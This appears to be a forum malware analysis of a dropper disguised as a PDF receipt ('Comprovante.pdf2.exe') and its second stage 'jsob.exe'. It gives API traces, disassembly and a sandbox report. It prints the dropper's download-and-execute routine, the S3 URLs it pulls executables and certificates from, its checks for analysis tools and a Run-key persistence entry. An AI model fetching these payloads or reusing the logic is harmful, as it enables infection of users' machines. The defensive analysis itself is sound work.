InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

In the root of the drive it creates a hidden system folder "wina" where the downloaded files are stored:

Code:
CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Download of the files and of the certificate (screenshot not reproduced):

Files created and connection to the URL (screenshot not reproduced):

Request for the file "sistema.html", not found on the server (screenshot not reproduced):

Analysis of the file "jsob.exe":
Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

Code:
 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
